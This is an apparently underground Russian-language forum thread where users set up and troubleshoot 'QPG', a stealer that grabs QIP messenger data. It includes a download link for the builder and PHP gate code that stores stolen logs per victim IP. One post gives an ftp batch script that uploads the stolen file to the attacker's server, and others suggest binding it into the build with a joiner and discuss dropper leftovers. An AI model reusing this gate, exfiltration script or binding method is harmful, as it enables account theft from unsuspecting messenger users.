GoldLIke, боюсь что это не из-за хоста... мне вчера пришел один отчет просто пустая папка, другой просто лог пустой. я пользуюсь jino-net.ru
Можно уменьшить размер в 2 раза сделав более упрощенную отправку на фтп без гейта. 1) делаем билд QPG, путь укажем например C:/file.xxx 2) создаем bat файл и пишем Code: ftp -s:имя_нашего файла.bat open фтп логин пароль cd /дирректория_на_фтп/ lcd C:\ put file.xxx quit q 3) клеем 2 файла: сначала выбираем QPG Билд, потом батник, клеем. я еще не пробовал но поидее должно сработать, если не получится то надо будет что-нибудь с задержкой в батнике придумать. еще я думаю можно будет доработать батник чтобы отчеты каждый раз дописывались в файл...
ой ой нет это плохая идея... батник не будет работать в склейке перегнал батник в ехе, размер получился 64кб вместо 1кб ((( чтобы поставить задержку можно воспользоваться пингом )) ping -n 2 127.0.0.1 > NUL 2 - это задержка в секундах я идиот, тут дело не в расширении, эт не получится так =((
mrTUZ, на отправку на фтп без гейта не обращаем внимания, это были глупые мысли вслух... качай билдер http://icqhools.in/QPGB.rar бери гейт например такой: Code: <? $ip=getenv("REMOTE_ADDR"); $filename=$_POST['fname']; $UIN=$_POST['UIN']; $text = $_POST['data']; @mkdir($ip); @chdir($ip); $fp = fopen("log_".$UIN."_".$filename.".txt", 'w'); fwrite($fp, $text); fclose($fp); ?> в нём есть дыра но он хорош в том плане что отчет с каждого нового ip кладётся в новую папку вообще лучше в аську стучи или еще лучше прочитай тему от начала до конца, всё доступно написано
у меня Не запускаеццо "Приложение не было запущено, поскольку оно некорректно настроено. Повторная установка приложения может решить данную проблему."
Что значит следущее... На фтп создаецца фаил log1___.txt ну не важно какое у него имя, лог короч, открываю его- пустой. И ещё, какого хера трояны дропперы появляются в Local\Temp и не удаляются после завершения работы, приходится в деспечере проц. снимать и удалять в ручную.
в коде есть уязвимые места..например это "hManForm := FindWindow('TManForm', 'QIP - Спокойное общение!');" другой скин..и пахате не будет...
Создаём значит на бесплатном хостинге сайт с поддержкой php. Льём туда gate.php с кодом Code: <? $ip=getenv("REMOTE_ADDR"); $filename=$_POST['fname']; $UIN=$_POST['UIN']; $text = $_POST['data']; @mkdir($ip); @chdir($ip); $fp = fopen("log_".$UIN."_".$filename.".txt", 'w'); fwrite($fp, $text); fclose($fp); ?> Запускаем QPG Builder...Пишем адрес сайта который запломбировали и путь к gate.php. что дальше? Аська должна быть запущенна, не понимаю основной смысл работы проги.